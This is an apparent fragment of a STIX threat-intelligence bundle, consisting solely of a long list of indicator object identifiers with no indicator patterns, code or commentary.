|
|
"indicator--58db6baf-741c-46d1-babb-4f92950d210f",
|
|
"indicator--58db6bb0-d0c4-4654-aff3-4d1e950d210f",
|
|
"indicator--58db6bb1-7d18-44e4-b8de-4765950d210f",
|
|
"indicator--58db6bb2-5a9c-47ac-82f7-458d950d210f",
|
|
"indicator--58db6bb3-a924-4e5e-9311-4f67950d210f",
|
|
"indicator--58db6bb4-bca4-4073-a6b4-405d950d210f",
|
|
"indicator--58db6bb4-1654-4ff4-b9bd-4d27950d210f",
|
|
"indicator--58db6bb5-d990-42c4-8c34-434d950d210f",
|
|
"indicator--58db6bb6-5d30-4f6e-9b06-4e34950d210f",
|
|
"indicator--58db6bb7-f7c4-4c72-a620-4841950d210f",
|
|
"indicator--58db6bb8-22dc-4645-8e5c-4006950d210f",
|
|
"indicator--58db6bb9-d95c-409f-9007-4a47950d210f",
|
|
"indicator--58db6bba-4298-41b8-a84f-499a950d210f",
|
|
"indicator--58db6bbb-6608-49b7-b00a-4dcc950d210f",
|
|
"indicator--58db6bbc-a478-4d95-b3fc-4c7b950d210f",
|
|
"indicator--58db6bbd-a728-41e3-8f09-4434950d210f",
|
|
"indicator--58db6bbe-0c70-467c-8888-43bd950d210f",
|
|
"indicator--58db6bbf-7d3c-467d-bf01-4d3a950d210f",
|
|
"indicator--58db6bc0-03d4-4efc-ba9d-4992950d210f",
|
|
"indicator--58db6bc0-073c-405f-b290-485e950d210f",
|
|
"indicator--58db6bc1-c8b0-4eba-a75c-4bc9950d210f",
|
|
"indicator--58db6bc2-e5a4-43d3-afc8-443d950d210f",
|
|
"indicator--58db6bc3-7ac4-4ee2-b833-4ea4950d210f",
|
|
"indicator--58db6bc4-eaf0-486d-b8e4-473c950d210f",
|
|
"indicator--58db6bc5-7fd8-4599-a033-40a2950d210f",
|
|
"indicator--58db6bc6-f26c-4cc9-937c-42aa950d210f",
|
|
"indicator--58db6bc6-ca68-40f8-9597-4f8c950d210f",
|
|
"indicator--58db6bc8-9df0-43b1-9569-41d0950d210f",
|
|
"indicator--58db6bc8-568c-4d26-9ea4-4202950d210f",
|
|
"indicator--58db6bc9-78c4-4d49-a583-4dff950d210f",
|
|
"indicator--58db6bca-24b4-480b-b022-4769950d210f",
|
|
"indicator--58db6bcb-87a4-499b-abeb-4f0d950d210f",
|
|
"indicator--58db6bcc-35f8-4745-9bb7-46cf950d210f",
|
|
"indicator--58db6bcd-ffcc-42c5-bbb9-49d4950d210f",
|
|
"indicator--58db6bce-6f50-4bbc-9dbd-4dff950d210f",
|
|
"indicator--58db6bce-5a98-4e95-956a-4ca2950d210f",
|
|
"indicator--58db6bcf-6660-4f7c-afb3-40ba950d210f",
|
|
"indicator--58db6bd0-13ac-43c7-8dba-4717950d210f",
|
|
"indicator--58db6bd1-9608-4224-945c-4744950d210f",
|
|
"indicator--58db6bd2-b970-4b10-a6ec-46dc950d210f",
|
|
"indicator--58db6bd3-483c-4469-9942-441f950d210f",
|
|
"indicator--58db6bd4-bdf4-4c3b-a80e-4946950d210f",
|
|
"indicator--58db6bd5-9ed8-4a29-bbe5-4ca4950d210f",
|
|
"indicator--58db6bd6-276c-46d8-ad32-485d950d210f",
|
|
"indicator--58db6bd7-ba08-4749-9c8a-4959950d210f",
|
|
"indicator--58db6bd8-03e0-4d12-8e76-4ee9950d210f",
|
|
"indicator--58db6bd8-68d0-4b2b-838c-4808950d210f",
|
|
"indicator--58db6bd9-f8f0-4e5f-baa5-4839950d210f",
|
|
"indicator--58db6bda-c920-4c78-b24f-4d3c950d210f",
|
|
"indicator--58db6bdb-09b8-4929-a998-47ca950d210f",
|
|
"indicator--58db6bdc-a2c8-47ff-85d5-4b84950d210f",
|
|
"indicator--58db6bdd-81a0-4aeb-a792-4b64950d210f",
|
|
"indicator--58db6bde-ce30-4ea5-8042-4e10950d210f",
|
|
"indicator--58db6bde-9a04-4e95-b29a-4634950d210f",
|
|
"indicator--58db6bdf-65ec-405d-a64a-40aa950d210f",
|
|
"indicator--58db6be0-5134-428a-b869-4954950d210f",
|
|
"indicator--58db6be1-cb5c-4824-9ea2-4d30950d210f",
|
|
"indicator--58db6be2-4abc-47e2-9deb-4371950d210f",
|
|
"indicator--58db6be3-64d8-47f1-8be4-4631950d210f",
|
|
"indicator--58db6be4-2280-4087-909d-4ec8950d210f",
|
|
"indicator--58db6be5-958c-4db2-95c0-48e6950d210f",
|
|
"indicator--58db6be6-c634-4054-9e8a-4fd2950d210f",
|
|
"indicator--58db6be6-953c-4f9e-9ad3-443e950d210f",
|
|
"indicator--58db6be7-b094-4593-b8b1-44fe950d210f",
|
|
"indicator--58db6be8-b5b8-49c5-96ec-40c9950d210f",
|
|
"indicator--58db6be9-e014-4633-a829-4bc6950d210f",
|
|
"indicator--58db6bea-7320-4089-9b67-4bdc950d210f",
|
|
"indicator--58db6beb-0bcc-4d55-a445-412a950d210f",
|
|
"indicator--58db6bec-c628-4bb8-9df0-4332950d210f",
|
|
"indicator--58db6bec-7340-450b-9214-4825950d210f",
|
|
"indicator--58db6bed-1b30-4336-9a2d-484c950d210f",
|
|
"indicator--58db6bee-2c40-4d3e-a041-436d950d210f",
|
|
"indicator--58db6bef-720c-4bb1-8f2e-4034950d210f",
|
|
"indicator--58db6bf0-cbc0-4ef4-a703-410a950d210f",
|
|
"indicator--58db6bf1-f48c-4180-9997-4718950d210f",
|
|
"indicator--58db6bf2-2060-47ed-a95e-4d82950d210f",
|
|
"indicator--58db6bf3-9f3c-4580-a409-41f7950d210f",
|
|
"indicator--58db6bf3-70a4-4a80-b29a-4d57950d210f",
|
|
"indicator--58db6bf4-7a70-48c1-968d-4f2b950d210f",
|
|
"indicator--58db6bf5-d25c-4d13-8de2-44d0950d210f",
|
|
"indicator--58db6bf6-2360-495b-9889-447b950d210f",
|
|
"indicator--58db6bf7-0220-4397-a992-4aa9950d210f",
|
|
"indicator--58db6bf8-5d80-463a-92e7-4e30950d210f",
|
|
"indicator--58db6bf9-15fc-44c2-b623-4c5d950d210f",
|
|
"indicator--58db6bf9-4988-409a-ae0d-4af8950d210f",
|
|
"indicator--58db6bfa-3758-458b-b71b-4bc1950d210f",
|
|
"indicator--58db6bfb-401c-4e80-b3e3-4561950d210f",
|
|
"indicator--58db6bfc-fdf8-4486-a4e1-4614950d210f",
|
|
"indicator--58db6bfd-ef48-4a70-970a-450e950d210f",
|
|
"indicator--58db6bfe-c718-4ee5-8597-45af950d210f",
|
|
"indicator--58db6bff-10c0-45fb-b042-4b6d950d210f",
|
|
"indicator--58db6bff-dbe0-48fb-966d-47a6950d210f",
|
|
"indicator--58db6c00-cb00-4660-9606-4b07950d210f",
|
|
"indicator--58db6c02-b860-4cf7-a158-4c65950d210f",
|
|
"indicator--58db6c03-9034-42b9-bc7a-4a1c950d210f",
|
|
"indicator--58db6c04-5354-4f70-9056-4bfb950d210f",
|
|
"indicator--58db6c04-9288-4930-92c8-4c99950d210f",
|
|
"indicator--58db6c05-3028-4773-9e27-4e19950d210f",
|
|
"indicator--58db6c06-86d4-4ac7-a22a-40ea950d210f",
|
|
"indicator--58db6c08-7288-4210-8d5e-4cb2950d210f",
|
|
"indicator--58db6c09-de6c-4338-a29e-45d9950d210f",
|
|
"indicator--58db6c09-f6e4-427d-bfb9-4d8b950d210f",
|
|
"indicator--58db6c0a-5460-4b6b-9f67-4298950d210f",
|
|
"indicator--58db6c0b-592c-4e20-ac57-45c5950d210f",
|
|
"indicator--58db6c0c-fc60-4a8b-adbf-430f950d210f",
|
|
"indicator--58db6c0d-bcac-44ee-bef1-4e06950d210f",
|
|
"indicator--58db6c0e-096c-4ca8-988b-4998950d210f",
|
|
"indicator--58db6c0e-32a0-411d-a2bb-40c4950d210f",
|
|
"indicator--58db6c0f-bd3c-46a1-88bc-466a950d210f",
|
|
"indicator--58db6c10-0534-4f30-acc6-48af950d210f",
|
|
"indicator--58db6c11-2648-448d-bf8e-4b3c950d210f",
|
|
"indicator--58db6c12-a8e0-42a6-9c43-4911950d210f",
|
|
"indicator--58db6c13-9504-427b-8674-4f70950d210f",
|
|
"indicator--58db6c14-e6b4-48c9-81e2-414d950d210f",
|
|
"indicator--58db6c15-0524-4395-a62c-46ae950d210f",
|
|
"indicator--58db6c15-2afc-48a2-9561-4457950d210f",
|
|
"indicator--58db6c16-a0f4-40be-90da-448e950d210f",
|
|
"indicator--58db6c17-382c-4e71-a36b-4835950d210f",
|
|
"indicator--58db6c18-78d4-4b82-a88c-42df950d210f",
|
|
"indicator--58db6c19-4240-4943-97b1-439e950d210f",
|
|
"indicator--58db6c1a-6948-4d71-bc30-41e2950d210f",
|
|
"indicator--58db6c1b-5184-4bbc-a01f-465f950d210f",
|
|
"indicator--58db6c1b-62dc-423a-b57b-4ca5950d210f",
|
|
"indicator--58db6c1c-5ca8-4e74-bf96-4835950d210f",
|
|
"indicator--58db6c1d-4754-4326-ac43-472e950d210f",
|
|
"indicator--58db6c1e-2920-450d-bffc-478c950d210f",
|
|
"indicator--58db6c1f-5308-4498-8654-48e9950d210f",
|
|
"indicator--58db6c20-5828-4a82-96ae-4844950d210f",
|
|
"indicator--58db6c21-8f94-4f32-9396-4e0d950d210f",
|
|
"indicator--58db6c22-90e0-4866-9047-4933950d210f",
|
|
"indicator--58db6c22-5398-4400-a0fa-4e6e950d210f",
|
|
"indicator--58db6c23-7194-40f5-bbee-4bda950d210f",
|
|
"indicator--58db6c24-74d0-4821-add1-421a950d210f",
|
|
"indicator--58db6c25-d034-4b82-a96c-48bf950d210f",
|
|
"indicator--58db6c26-2834-4d32-9acf-4a17950d210f",
|
|
"indicator--58db6c27-6e98-4708-855d-4404950d210f",
|
|
"indicator--58db6c28-9624-4269-a672-4d07950d210f",
|
|
"indicator--58db6c29-f03c-48a5-858c-427b950d210f",
|
|
"indicator--58db6c2a-2ef0-436b-81fc-4b08950d210f",
|
|
"indicator--58db6c2a-ce64-4410-a3ce-428e950d210f",
|
|
"indicator--58db6c2b-40f8-4108-b9d8-49d7950d210f",
|
|
"indicator--58db6c2c-5934-4ba8-8711-4e33950d210f",
|
|
"indicator--58db6c2d-1b64-41ee-b8b7-4bd1950d210f",
|
|
"indicator--58db6c2e-ad84-42d4-b7c1-4463950d210f",
|
|
"indicator--58db6c2f-0420-48aa-8bf2-4aa0950d210f",
|
|
"indicator--58db6c30-3f68-4938-b307-4026950d210f",
|
|
"indicator--58db6c31-d7bc-4903-8c28-41d1950d210f",
|
|
"indicator--58db6c31-c78c-416d-a0bd-4669950d210f",
|
|
"indicator--58db6c32-564c-44fe-a020-471a950d210f",
|
|
"indicator--58db6c33-ad34-4e29-903c-42ea950d210f",
|
|
"indicator--58db6c34-6d8c-4872-be75-4e31950d210f",
|
|
"indicator--58db6c35-51d4-49ce-821d-4b0c950d210f",
|
|
"indicator--58db6c36-2c94-4e60-bcbf-47ab950d210f",
|
|
"indicator--58db6c37-4858-438a-a957-464a950d210f",
|
|
"indicator--58db6c38-f7c0-4509-ab4f-4a8d950d210f",
|
|
"indicator--58db6c38-dcb0-40f1-8a2e-44ff950d210f",
|
|
"indicator--58db6c39-ffa4-4029-a678-4133950d210f",
|
|
"indicator--58db6c3a-ff84-4439-b7f6-427d950d210f",
|
|
"indicator--58db6c3b-9fec-4a6d-9f3f-4f7d950d210f",
|
|
"indicator--58db6c3c-3d10-4c0e-94ac-4645950d210f",
|
|
"indicator--58db6c3d-5920-460f-8e5e-44cf950d210f",
|
|
"indicator--58db6c3e-85f4-43e0-90a5-447e950d210f",
|
|
"indicator--58db6c3f-5a90-4c3e-85b6-42bc950d210f",
|
|
"indicator--58db6c3f-44f4-4208-891d-4de2950d210f",
|
|
"indicator--58db6c40-c9f8-41ba-ba56-4d4a950d210f",
|
|
"indicator--58db6c41-9184-4bfd-99a4-457d950d210f",
|
|
"indicator--58db6c42-a04c-4e4f-9627-494a950d210f",
|
|
"indicator--58db6c43-d4d0-4445-a7ac-4c5d950d210f",
|
|
"indicator--58db6c44-6aa4-43f6-9872-4384950d210f",
|
|
"indicator--58db6c44-7fc4-4aca-bc55-4610950d210f",
|
|
"indicator--58db6c45-23d0-42de-87e0-4f23950d210f",
|
|
"indicator--58db6c46-11fc-44ba-96b2-41a8950d210f",
|
|
"indicator--58db6c47-2024-4f01-b37c-4aa9950d210f",
|
|
"indicator--58db6c48-b880-483c-b964-4757950d210f",
|
|
"indicator--58db6c49-9ef8-4764-88c4-44f3950d210f",
|
|
"indicator--58db6c4a-4168-4e1b-9d93-4757950d210f",
|
|
"indicator--58db6c4a-c618-4e37-97ab-4602950d210f",
|
|
"indicator--58db6c4b-478c-4a0f-bbcd-4c4f950d210f",
|
|
"indicator--58db6c4c-74bc-4990-b95a-4d0b950d210f",
|
|
"indicator--58db6c4d-0550-4e39-b5f9-4b58950d210f",
|
|
"indicator--58db6c4e-a4ec-4ac8-b02c-4876950d210f",
|
|
"indicator--58db6c4f-f570-4857-9a6b-411f950d210f",
|
|
"indicator--58db6c50-951c-408e-aa98-4ecc950d210f",
|
|
"indicator--58db6c50-f1a0-4153-b127-427c950d210f",
|
|
"indicator--58db6c51-294c-4a5f-b569-4c84950d210f",
|
|
"indicator--58db6c52-93dc-4b4b-a003-4ff2950d210f",
|
|
"indicator--58db6c53-2384-41d4-805a-4dcf950d210f",
|
|
"indicator--58db6c54-68a0-44d5-8760-4920950d210f",
|
|
"indicator--58db6c55-f07c-4a61-a586-490e950d210f",
|
|
"indicator--58db6c56-d7cc-44ff-9f61-4b83950d210f",
|
|
"indicator--58db6c57-45f8-4850-854e-4660950d210f",
|
|
"indicator--58db6c57-d1bc-4854-832f-42cb950d210f",
|
|
"indicator--58db6c58-8608-4680-b2c1-434d950d210f",
|
|
"indicator--58db6c59-db3c-4f28-9d0c-439d950d210f",
|
|
"indicator--58db6c5a-9578-442b-bf57-4877950d210f",
|
|
"indicator--58db6c5b-e6a8-4ba7-a600-4904950d210f",
|
|
"indicator--58db6c5c-4ba0-49fa-9571-42c1950d210f",
|
|
"indicator--58db6c5d-bce0-48fe-a95b-4381950d210f",
|
|
"indicator--58db6c5e-5284-4f74-8aa2-4d72950d210f",
|
|
"indicator--58db6c5e-d744-4c52-9939-406f950d210f",
|
|
"indicator--58db6c5f-4680-41b9-a0d3-4542950d210f",
|
|
"indicator--58db6c60-1238-4d71-ba09-41dd950d210f",
|
|
"indicator--58db6c61-d538-48ef-a219-45ed950d210f",
|
|
"indicator--58db6c62-a250-4afe-8d69-4e4b950d210f",
|
|
"indicator--58db6c63-585c-49c3-8fc6-455c950d210f",
|
|
"indicator--58db6c64-aaf4-4145-afc4-4580950d210f",
|
|
"indicator--58db6c65-dd3c-416d-8193-4b15950d210f",
|
|
"indicator--58db6c65-60b0-4897-b06a-4c33950d210f",
|
|
"indicator--58db6c66-b374-481d-94fe-4c0c950d210f",
|
|
"indicator--58db6c67-2ff4-4171-b915-4758950d210f",
|
|
"indicator--58db6c68-5950-485b-8f67-437f950d210f",
|
|
"indicator--58db6c69-81b8-4fd6-baa0-4ff8950d210f",
|
|
"indicator--58db6c6a-93cc-4b92-b30b-4ec2950d210f",
|
|
"indicator--58db6c6a-b24c-44d8-a66b-4492950d210f",
|
|
"indicator--58db6c6b-89a0-4d24-87c2-41b0950d210f",
|
|
"indicator--58db6c6c-0b3c-4f48-a7e8-41cf950d210f",
|
|
"indicator--58db6c6d-f134-4903-959f-43fe950d210f",
|
|
"indicator--58db6c6e-e290-4f9a-8be1-48c8950d210f",
|
|
"indicator--58db6c6f-bb08-4cbc-bb18-4bf3950d210f",
|
|
"indicator--58db6c6f-5f1c-4bc6-b447-4634950d210f",
|
|
"indicator--58db6c70-3880-4ae2-8ccb-4c00950d210f",
|
|
"indicator--58db6c71-dfac-40a6-a4e8-4d0d950d210f",
|
|
"indicator--58db6c72-7c58-43e8-9069-4d3f950d210f",
|
|
"indicator--58db6c73-79c8-492a-87fb-4d91950d210f",
|
|
"indicator--58db6c74-62d4-4195-a4c2-4a4a950d210f",
|
|
"indicator--58db6c74-8308-45a9-8929-4c63950d210f",
|
|
"indicator--58db6c75-8374-4b11-ac52-4ad0950d210f",
|
|
"indicator--58db6c76-8d88-4411-bfa7-4858950d210f",
|
|
"indicator--58db6c77-29f4-44a6-8a06-4322950d210f",
|
|
"indicator--58db6c78-985c-44d8-bac8-4200950d210f",
|
|
"indicator--58db6c79-cf78-48df-a826-496a950d210f",
|
|
"indicator--58db6c79-4b14-4c7e-b115-4156950d210f",
|
|
"indicator--58db6c7a-8040-4432-911a-4f61950d210f",
|
|
"indicator--58db6c7b-7d44-4c6c-86e1-43b4950d210f",
|
|
"indicator--58db6c7c-f698-4d49-81f6-4856950d210f",
|
|
"indicator--58db6c7d-de68-43f2-9579-482e950d210f",
|
|
"indicator--58db6c7e-7198-436d-bd47-453b950d210f",
|
|
"indicator--58db6c7e-c470-43cb-8855-44fe950d210f",
|
|
"indicator--58db6c7f-df10-43fb-82af-4f5a950d210f",
|
|
"indicator--58db6c80-b91c-408c-b68f-4460950d210f",
|
|
"indicator--58db6c81-2ee4-4dea-b68c-4693950d210f",
|
|
"indicator--58db6c82-f624-4360-a255-475f950d210f",
|
|
"indicator--58db6c83-3574-4203-a32d-4a74950d210f",
|
|
"indicator--58db6c84-621c-4022-90fc-48fb950d210f",
|
|
"indicator--58db6c84-95c8-4c93-8492-4e32950d210f",
|
|
"indicator--58db6c85-d390-484f-b553-4a50950d210f",
|
|
"indicator--58db6c86-4ba8-4062-a379-446d950d210f",
|
|
"indicator--58db6c87-eb60-48eb-9713-4414950d210f",
|
|
"indicator--58db6c88-9cec-42df-a70f-4adf950d210f",
|
|
"indicator--58db6c89-0dbc-4496-b6b3-4a7e950d210f",
|
|
"indicator--58db6c89-3d5c-43c0-a623-48ab950d210f",
|
|
"indicator--58db6c8a-e464-4a3a-aa74-4b65950d210f",
|
|
"indicator--58db6c8b-5780-471f-8b92-4de6950d210f",
|
|
"indicator--58db6c8c-e978-4d1c-bc74-4038950d210f",
|
|
"indicator--58db6c8d-2acc-4137-bb1b-4eb2950d210f",
|
|
"indicator--58db6c8e-8a74-42de-bb33-4063950d210f",
|
|
"indicator--58db6c8e-5fc4-4cf1-98f4-4ff2950d210f",
|
|
"indicator--58db6c8f-c9cc-437d-a95c-4d23950d210f",
|
|
"indicator--58db6c90-cc7c-4f33-98dc-4ff5950d210f",
|
|
"indicator--58db6c91-53bc-4a63-b695-47b8950d210f",
|
|
"indicator--58db6c92-d744-449d-a01a-4f55950d210f",
|
|
"indicator--58db6c93-5da0-41c7-9df3-40d8950d210f",
|
|
"indicator--58db6c93-71c0-4ddd-a930-4e01950d210f",
|
|
"indicator--58db6c94-80f0-4646-822d-4f69950d210f",
|
|
"indicator--58db6c95-5524-4166-8886-46f9950d210f",
|
|
"indicator--58db6c96-46ac-4b2d-aff5-4717950d210f",
|
|
"indicator--58db6c97-bbb4-42c1-bca8-4158950d210f",
|
|
"indicator--58db6c98-51cc-4be1-8578-4690950d210f",
|
|
"indicator--58db6c98-0afc-42ad-bde7-4698950d210f",
|
|
"indicator--58db6c99-0530-407c-a599-47d6950d210f",
|
|
"indicator--58db6c9a-5384-4914-a985-4a50950d210f",
|
|
"indicator--58db6c9b-77a8-407a-abd9-480a950d210f",
|
|
"indicator--58db6c9c-fcd4-4119-8bbd-4c7a950d210f",
|
|
"indicator--58db6c9d-addc-404f-bb55-4a2a950d210f",
|
|
"indicator--58db6c9d-4dcc-4d54-8383-4ff9950d210f",
|
|
"indicator--58db6c9e-9a00-4c45-98fe-4780950d210f",
|
|
"indicator--58db6c9f-1588-446d-9380-4b1f950d210f",
|
|
"indicator--58db6ca0-e308-484f-9f8c-4420950d210f",
|
|
"indicator--58db6ca1-4e78-4906-b47e-47ec950d210f",
|
|
"indicator--58db6ca2-6e2c-427d-bbe4-421e950d210f",
|
|
"indicator--58db6ca2-4064-420a-848f-493f950d210f",
|
|
"indicator--58db6ca3-6154-426f-a356-4611950d210f",
|
|
"indicator--58db6ca4-d5cc-4643-bcbc-479c950d210f",
|
|
"indicator--58db6ca5-7b7c-4691-809a-4243950d210f",
|
|
"indicator--58db6ca6-09e8-4256-9b6a-4389950d210f",
|
|
"indicator--58db6ca7-6c28-4d28-ae30-4fc0950d210f",
|
|
"indicator--58db6ca7-0300-46be-b025-4853950d210f",
|
|
"indicator--58db6ca8-bf40-4c91-9a89-4894950d210f",
|
|
"indicator--58db6ca9-1f88-466e-8667-4ace950d210f",
|
|
"indicator--58db6caa-506c-4151-a4dc-4a9a950d210f",
|
|
"indicator--58db6cab-c3dc-4c25-b3aa-4ffa950d210f",
|
|
"indicator--58db6cac-15a0-4419-b2f1-4839950d210f",
|
|
"indicator--58db6cac-60f0-48fc-b45d-4049950d210f",
|
|
"indicator--58db6cad-ac5c-4a87-89a9-4528950d210f",
|
|
"indicator--58db6cae-5194-49e8-93c2-448a950d210f",
|
|
"indicator--58db6caf-9710-4958-93af-4443950d210f",
|
|
"indicator--58db6cb0-034c-49e7-a3d2-4f24950d210f",
|
|
"indicator--58db6cb1-b168-47ce-9dc1-4924950d210f",
|
|
"indicator--58db6cb1-3efc-40f9-8dbd-4de8950d210f",
|
|
"indicator--58db6cb2-dee8-467c-853d-49fd950d210f",
|
|
"indicator--58db6cb3-34a0-4edf-9d6f-4ee4950d210f",
|
|
"indicator--58db6cb4-e08c-4bf8-a014-40e8950d210f",
|
|
"indicator--58db6cb5-97d8-47a8-898d-4a83950d210f",
|
|
"indicator--58db6cb6-7520-49f7-8f6a-4047950d210f",
|
|
"indicator--58db6cb7-4bd8-4adf-873d-4f70950d210f",
|
|
"indicator--58db6cb7-2d98-472f-85ec-4ac7950d210f",
|
|
"indicator--58db6cb8-3e00-4785-9a73-48d4950d210f",
|
|
"indicator--58db6cb9-abac-4791-be60-4494950d210f",
|
|
"indicator--58db6cba-ee18-4bf0-8fd2-4fa1950d210f",
|
|
"indicator--58db6cbb-6004-481f-952b-4fa6950d210f",
|
|
"indicator--58db6cbc-4878-47d0-bd95-41a5950d210f",
|
|
"indicator--58db6cbd-f2b8-4d71-80d3-4933950d210f",
|
|
"indicator--58db6cbe-a024-479b-88ad-4e46950d210f",
|
|
"indicator--58db6cbe-e208-4b5c-b701-4b53950d210f",
|
|
"indicator--58db6cbf-efe8-4357-87b7-411d950d210f",
|
|
"indicator--58db6cc0-41dc-437f-810b-4022950d210f",
|
|
"indicator--58db6cc1-8928-4d9e-ae35-4574950d210f",
|
|
"indicator--58db6cc2-813c-44cf-b3e9-41cf950d210f",
|
|
"indicator--58db6cc3-c054-4930-ad1b-436a950d210f",
|
|
"indicator--58db6cc3-766c-4634-ad1a-4182950d210f",
|
|
"indicator--58db6cc4-1298-4943-86e8-4dd3950d210f",
|
|
"indicator--58db6cc5-659c-4431-ab95-4cc3950d210f",
|
|
"indicator--58db6cc6-fb30-4bdd-9bb3-4525950d210f",
|
|
"indicator--58db6cc7-bc0c-4075-b248-4291950d210f",
|
|
"indicator--58db6cc8-67e0-4698-abf8-4f08950d210f",
|
|
"indicator--58db6cc9-4b2c-42af-a42f-4f8d950d210f",
|
|
"indicator--58db6cc9-6324-4856-9685-4a69950d210f",
|
|
"indicator--58db6cca-ec9c-4913-a97a-4e86950d210f",
|
|
"indicator--58db6ccb-3014-4f0a-b74f-4283950d210f",
|
|
"indicator--58db6ccc-6b20-4c18-969e-42d5950d210f",
|
|
"indicator--58db6ccd-3074-400d-b077-4ebb950d210f",
|
|
"indicator--58db6cce-e974-4398-974e-4aa7950d210f",
|
|
"indicator--58db6cce-d820-4861-a896-4af5950d210f",
|
|
"indicator--58db6ccf-0374-4f54-9167-4fef950d210f",
|
|
"indicator--58db6cd0-6000-4ce6-bb18-4ef8950d210f",
|
|
"indicator--58db6cd1-f660-4f4c-87b5-4a95950d210f",
|
|
"indicator--58db6cd2-1290-41c2-9f87-4461950d210f",
|
|
"indicator--58db6cd3-42d0-416f-8886-4ec1950d210f",
|
|
"indicator--58db6cd4-01d0-4468-bf8c-4076950d210f",
|
|
"indicator--58db6cd4-32d4-4f01-be6c-454c950d210f",
|
|
"indicator--58db6cd5-0ca8-45e0-ab5c-49b0950d210f",
|
|
"indicator--58db6cd6-fea0-4233-8097-44e1950d210f",
|
|
"indicator--58db6cd7-efa0-4b82-97bd-44e2950d210f",
|
|
"indicator--58db6cd8-6888-4f4b-857d-4767950d210f",
|
|
"indicator--58db6cd9-f0f0-4eb3-97c3-4b6f950d210f",
|
|
"indicator--58db6cda-58b4-4d22-98bd-4fdf950d210f",
|
|
"indicator--58db6cda-adfc-4b21-b3b8-4848950d210f",
|
|
"indicator--58db6cdb-1b28-43af-9ae4-4a26950d210f",
|
|
"indicator--58db6cdc-ddec-4474-b02b-47f5950d210f",
|
|
"indicator--58db6cdd-1c78-429f-a532-4c98950d210f",
|
|
"indicator--58db6cde-349c-4e2f-b8b9-4b7d950d210f",
|
|
"indicator--58db6cdf-8a84-42fa-9e87-4864950d210f",
|
|
"indicator--58db6ce0-e934-430a-8bd3-4764950d210f",
|
|
"indicator--58db6ce0-d2b4-4d8d-9fb7-4bea950d210f",
|
|
"indicator--58db6ce1-7b34-4c38-841d-4674950d210f",
|
|
"indicator--58db6ce2-fb1c-4ed5-b3e3-42e9950d210f",
|
|
"indicator--58db6ce3-4084-4d0a-aa59-4c6b950d210f",
|
|
"indicator--58db6ce4-e8d0-487f-9ebd-49a1950d210f",
|
|
"indicator--58db6ce5-0a80-434d-a6ea-417c950d210f",
|
|
"indicator--58db6ce5-c274-495f-9fac-4819950d210f",
|
|
"indicator--58db6ce6-2598-42c1-bd93-44ec950d210f",
|
|
"indicator--58db6ce7-ec68-42da-9209-468a950d210f",
|
|
"indicator--58db6ce8-6980-430c-a6c6-477e950d210f",
|
|
"indicator--58db6ce9-fe48-4ea3-9189-458d950d210f",
|
|
"indicator--58db6cea-7a08-4905-b596-4635950d210f",
|
|
"indicator--58db6cea-e9f4-4a12-9040-4314950d210f",
|
|
"indicator--58db6ceb-5be4-44b6-a5e8-4eb1950d210f",
|
|
"indicator--58db6cec-6424-449c-a03f-4803950d210f",
|
|
"indicator--58db6ced-3e74-4255-8bfa-4e61950d210f",
|
|
"indicator--58db6cee-9498-4282-88ab-4b93950d210f",
|
|
"indicator--58db6cef-d934-4a20-a4bd-4e1b950d210f",
|
|
"indicator--58db6cf0-f8ec-4814-9ba9-4393950d210f",
|
|
"indicator--58db6cf0-da00-4b18-9546-4682950d210f",
|
|
"indicator--58db6cf1-3b20-4dd0-a4ee-4be9950d210f",
|
|
"indicator--58db6cf2-92c4-44cd-ab2c-4265950d210f",
|
|
"indicator--58db6cf3-f040-4b9e-b04c-4678950d210f",
|
|
"indicator--58db6cf4-5d50-4a73-ac91-438a950d210f",
|
|
"indicator--58db6cf5-e6d4-40a5-90cc-461f950d210f",
|
|
"indicator--58db6cf6-35e8-4047-9239-4d2d950d210f",
|
|
"indicator--58db6cf6-2b98-429c-991e-42ff950d210f",
|
|
"indicator--58db6cf7-be9c-42c0-9608-4099950d210f",
|
|
"indicator--58db6cf8-e29c-4f79-b7d4-47b2950d210f",
|
|
"indicator--58db6cf9-b7f4-4620-a999-485a950d210f",
|
|
"indicator--58db6cfa-f240-44b6-b3d1-489f950d210f",
|
|
"indicator--58db6cfb-58f0-4328-8819-46e5950d210f",
|
|
"indicator--58db6cfc-0ac8-40a8-9e96-45a8950d210f",
|
|
"indicator--58db6cfc-6420-44d2-90fa-4d38950d210f",
|
|
"indicator--58db6cfd-1454-4041-9826-49e3950d210f",
|
|
"indicator--58db6cfe-28d0-4c95-a4dd-47d1950d210f",
|
|
"indicator--58db6cff-177c-4f70-8dcd-438f950d210f",
|
|
"indicator--58db6d00-bb70-4804-8d24-4a87950d210f",
|
|
"indicator--58db6d01-92d4-4dd4-bc5b-4f1f950d210f",
|
|
"indicator--58db6d02-3454-4039-870c-4887950d210f",
|
|
"indicator--58db6d02-0860-424b-98f9-4b14950d210f",
|
|
"indicator--58db6d03-3468-4fe4-a628-49f3950d210f",
|
|
"indicator--58db6d04-d974-4253-9642-4f14950d210f",
|
|
"indicator--58db6d05-b58c-491c-9dcb-48b4950d210f",
|
|
"indicator--58db6d06-044c-47be-894f-446c950d210f",
|
|
"indicator--58db6d07-a1ac-48e1-8f6f-402b950d210f",
|
|
"indicator--58db6d08-9e08-463a-80c6-45e9950d210f",
|
|
"indicator--58db6d08-424c-4cbe-8a48-48b2950d210f",
|
|
"indicator--58db6d09-3474-4193-9139-4c0b950d210f",
|
|
"indicator--58db6d0a-a614-4052-8292-46d6950d210f",
|
|
"indicator--58db6d0b-1180-4934-9f48-4a18950d210f",
|
|
"indicator--58db6d0c-86f8-4bb8-bd40-4e5c950d210f",
|
|
"indicator--58db6d0d-ac94-4719-b647-46c2950d210f",
|
|
"indicator--58db6d0e-b390-4a6e-8f96-4206950d210f",
|
|
"indicator--58db6d0e-1650-4e7f-b7bc-4358950d210f",
|
|
"indicator--58db6d0f-f340-4cc4-9763-49c3950d210f",
|
|
"indicator--58db6d10-5724-47e2-9c31-40a2950d210f",
|
|
"indicator--58db6d11-e9d4-423b-9eb4-4e42950d210f",
|
|
"indicator--58db6d12-b6a8-4886-bfdb-4cf8950d210f",
|
|
"indicator--58db6d13-6a18-409e-8f58-46de950d210f",
|
|
"indicator--58db6d14-7c44-4c56-9785-45fa950d210f",
|
|
"indicator--58db6d14-d7bc-4996-890f-4acd950d210f",
|
|
"indicator--58db6d15-3fec-4ac8-960c-4980950d210f",
|
|
"indicator--58db6d16-9b5c-4db8-8374-4fb3950d210f",
|
|
"indicator--58db6d17-c47c-4633-8083-4adc950d210f",
|
|
"indicator--58db6d18-c13c-4145-8ad5-4cad950d210f",
|
|
